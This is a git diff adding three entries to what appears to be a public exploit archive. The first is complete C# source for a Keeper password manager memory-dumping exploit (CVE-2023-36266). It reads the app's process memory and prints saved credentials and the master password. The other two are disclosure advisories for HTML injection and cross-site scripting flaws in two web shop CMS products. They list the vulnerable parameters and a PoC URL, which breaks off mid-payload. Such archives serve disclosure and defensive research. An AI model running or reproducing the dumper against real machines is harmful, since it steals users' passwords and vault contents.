diff --git a/exploits/multiple/local/51623.cs b/exploits/multiple/local/51623.cs new file mode 100644 index 000000000..85111030d --- /dev/null +++ b/exploits/multiple/local/51623.cs @@ -0,0 +1,209 @@ +# Exploit Title: Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping +# Google Dork: NA +# Date: 22-07-2023 +# Exploit Author: H4rk3nz0 +# Vendor Homepage: https://www.keepersecurity.com/en_GB/ +# Software Link: https://www.keepersecurity.com/en_GB/get-keeper.html +# Version: Desktop App version 16.10.2 & Browser Extension version 16.5.4 +# Tested on: Windows +# CVE : CVE-2023-36266 + +using System; +using System.Management; +using System.Diagnostics; +using System.Linq; +using System.Runtime.InteropServices; +using System.Text; +using System.Text.RegularExpressions; +using System.Collections.Generic; + +// Keeper Security Password vault Desktop application and Browser Extension stores credentials in plain text in memory +// This can persist after logout if the user has not explicitly enabled the option to 'clear process memory' +// As a result of this one can extract credentials & master password from a victim after achieving low priv access +// This does NOT target or extract credentials from the affected browser extension (yet), only the Windows desktop app. +// Github: https://github.com/H4rk3nz0/Peeper + +static class Program +{ + // To make sure we are targetting the right child process - check command line + public static string GetCommandLine(this Process process) + { + if (process is null || process.Id < 1) + { + return ""; + } + string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}"; + using (var searcher = new ManagementObjectSearcher(query)) + using (var collection = searcher.Get()) + { + var managementObject = collection.OfType().FirstOrDefault(); + return managementObject != null ? (string)managementObject["CommandLine"] : ""; + } + } + + //Extract plain text credential JSON strings (regex inelegant but fast) + public static void extract_credentials(string text) + { + int index = text.IndexOf("{\"title\":\""); + int eindex = text.IndexOf("}"); + while (index >= 0) + { + try + { + int endIndex = Math.Min(index + eindex, text.Length); + Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))"); + string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString(); + + int match_cut = match.IndexOf("} "); + if (match_cut != -1 ) + { + match = match.Substring(0, match_cut + "} ".Length).TrimEnd(); + if (!stringsList.Contains(match) && match.Length > 20) + { + Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "} ".Length) + "\n"); + stringsList.Add(match); + } + + } else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20) + { + Console.WriteLine("->Credential Record Found : " + match + "\n"); + stringsList.Add(match.TrimEnd()); + } + index = text.IndexOf("{\"title\":\"", index + 1); + eindex = text.IndexOf("}", eindex + 1); + } + catch + { + return; + } + + } + } + + // extract account/email containing JSON string + public static void extract_account(string text) + { + int index = text.IndexOf("{\"expiry\""); + int eindex = text.IndexOf("}"); + while (index >= 0) + { + try + { + int endIndex = Math.Min(index + eindex, text.Length); + Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)"); + string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString(); + if ((match.Length > 2)) + { + Console.WriteLine("->Account Record Found : " + match + "\n"); + return; + } + index = text.IndexOf("{\"expiry\"", index + 1); + eindex = text.IndexOf("}", eindex + 1); + } + catch + { + return; + } + } + + } + + // Master password not available with SSO based logins but worth looking for. + // Disregard other data key entries that seem to match: _not_master_key_example + public static void extract_master(string text) + { + int index = text.IndexOf("data_key"); + int eindex = index + 64; + while (index >= 0) + { + try + { + int endIndex = Math.Min(index + eindex, text.Length); + Regex reg = new Regex("(data_key[ -~]+)"); + var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString(); + Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})"); + if (match_one.Replace("data_key", "").Length > 5) + { + if (!clean.IsMatch(match_one.Replace("data_key", ""))) + { + Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n"); + } + + } + index = text.IndexOf("data_key", index + 1); + eindex = index + 64; + } + catch + { + return; + } + + } + } + + // Store extracted strings and comapre + public static List stringsList = new List(); + + // Main function, iterates over private committed memory pages, reads memory and performs regex against the pages UTF-8 + // Performs OpenProcess to get handle with necessary query permissions + static void Main(string[] args) + { + foreach (var process in Process.GetProcessesByName("keeperpasswordmanager")) + { + string commandline = GetCommandLine(process); + if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7")) + { + Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString()); + Console.WriteLine("->Searching...\n"); + IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id); + IntPtr address = new IntPtr(0x10000000000); + MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION(); + while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0) + { + if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000) + { + byte[] buffer = new byte[(int)memInfo.RegionSize]; + if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0) + { + string text = Encoding.ASCII.GetString(buffer); + extract_credentials(text); + extract_master(text); + extract_account(text); + } + } + + address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64()); + } + + CloseHandle(processHandle); + + } + + } + + } + + [DllImport("kernel32.dll")] + public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId); + + [DllImport("kernel32.dll")] + public static extern bool CloseHandle(IntPtr hObject); + + [DllImport("ntdll.dll")] + public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead); + + [DllImport("kernel32.dll", SetLastError = true)] + public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength); + + [StructLayout(LayoutKind.Sequential)] + public struct MEMORY_BASIC_INFORMATION + { + public IntPtr BaseAddress; + public IntPtr AllocationBase; + public uint AllocationProtect; + public IntPtr RegionSize; + public uint State; + public uint Protect; + public uint Type; + } +} \ No newline at end of file diff --git a/exploits/php/webapps/51613.txt b/exploits/php/webapps/51613.txt new file mode 100644 index 000000000..ba4144878 --- /dev/null +++ b/exploits/php/webapps/51613.txt @@ -0,0 +1,174 @@ +# Exploit Title: Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities +References (Source): https://www.vulnerability-lab.com/get_content.php?id=2278 +Release Date: +2023-07-04 +Vulnerability Laboratory ID (VL-ID): 2278 + +Common Vulnerability Scoring System: 5.4 + +Product & Service Introduction: +=============================== +https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432 + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application. + + +Affected Product(s): +==================== +ActiveITzone +Product: Active Super Shop CMS v2.5 (CMS) (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2021-08-20: Researcher Notification & Coordination (Security Researcher) +2021-08-21: Vendor Notification (Security Department) +2021-**-**: Vendor Response/Feedback (Security Department) +2021-**-**: Vendor Fix/Patch (Service Developer Team) +2021-**-**: Security Acknowledgements (Security Department) +2023-07-05: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted Authentication (User Privileges) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Responsible Disclosure + + +Technical Details & Description: +================================ +Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application. +The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content. + +The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module. +Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on +profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the +manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview +of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side. + +Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and +persistent manipulation of affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Manage Details + +Vulnerable Parameter(s): +[+] name +[+] phone +[+] address + +Affected Module(s): +[+] manage profile +[+] products branding + + +Proof of Concept (PoC): +======================= +The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction. +For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. + + +Exploitation: Payload + + + +Vulnerable Source: manage_admin & branding +
+
+

Manage Details

+
+
+
+
+ +
+" id="demo-hor-1" class="form-control required"> +
+
+ +
+ +
+
+ +
+" id="demo-hor-3" class="form-control"> +
+ + +--- PoC Session Logs (POST) --- +https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/ +Host: assm_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: text/html, */*; q=0.01 +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------280242453224137385302547344680 +Content-Length: 902 +Origin:https://assm_cms.localhost:8080 +Connection: keep-alive +Referer:https://assm_cms.localhost:8080/shop/admin/manage_admin/ +Cookie: ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; curr=1 +- +POST: HTTP/3.0 200 OK +content-type: text/html; charset=UTF-8 +ci_session=5n6fmo5q5gvik6i5hh2b72uonuem9av3; path=/; HttpOnly +https://assm_cms.localhost:8080/shop/admin/manage_admin/ +Host: assm_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive + + +Reference(s): +https://assm_cms.localhost:8080/shop/ +https://assm_cms.localhost:8080/shop/admin/ +https://assm_cms.localhost:8080/shop/admin/manage_admin/ +https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/ + + +Solution - Fix & Patch: +======================= +Disallow inseration of html code for input fields like name, adress and phone. Sanitize the content to secure deliver. + + +Security Risk: +============== +The security risk of the html injection web vulnerabilities in the shopping web-application are estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab \ No newline at end of file diff --git a/exploits/php/webapps/51614.txt b/exploits/php/webapps/51614.txt new file mode 100644 index 000000000..8b844299a --- /dev/null +++ b/exploits/php/webapps/51614.txt @@ -0,0 +1,144 @@ +Exploit Title: PaulPrinting CMS - (Search Delivery) Cross Site Scripting +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2286 +Release Date: +============= +2023-07-17 +Vulnerability Laboratory ID (VL-ID): +==================================== +2286 +Common Vulnerability Scoring System: +==================================== +5.2 +Vulnerability Class: +==================== +Cross Site Scripting - Non Persistent + +Product & Service Introduction: +=============================== +PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface. + +(Copy of the Homepage:https://codecanyon.net/user/codepaul ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the PaulPrinting (v2018) cms web-application. + + +Vulnerability Disclosure Timeline: +================================== +2022-08-25: Researcher Notification & Coordination (Security Researcher) +2022-08-26: Vendor Notification (Security Department) +2022-**-**: Vendor Response/Feedback (Security Department) +2022-**-**: Vendor Fix/Patch (Service Developer Team) +2022-**-**: Security Acknowledgements (Security Department) +2023-07-17: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Open Authentication (Anonymous Privileges) + + +User Interaction: +================= +Medium User Interaction + + +Disclosure Type: +================ +Responsible Disclosure + + +Technical Details & Description: +================================ +A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application. +Remote attackers are able to manipulate client-side requests by injection of malicious script code to compromise user session data. + +The client-side cross site scripting web vulnerability is located in the search input field with the insecure validated q parameter +affecting the delivery module. Remote attackers are able to inject own malicious script code to the search input to provoke a client-side +script code execution without secure encode. The request method to execute is GET and the attack vector is non-persistent. + +Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects +to malicious source and non-persistent manipulation of affected application modules. + + +Request Method(s): +[+] GET + +Vulnerable Module(s): +[+] /account/delivery + +Vulnerable Input(s): +[+] Search + +Vulnerable Parameter(s): +[+] q + +Affected Module(s): +[+] /account/delivery +[+] Delivery Contacts + + +Proof of Concept (PoC): +======================= +The non-persistent xss web vulnerability can be exploited by remote attackers with low privileged user account and medium user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + +PoC: Example +https://codeawesome.in/printing/account/delivery?q= + +PoC: Exploitation +https://codeawesome.in/printing/account/delivery?q=a">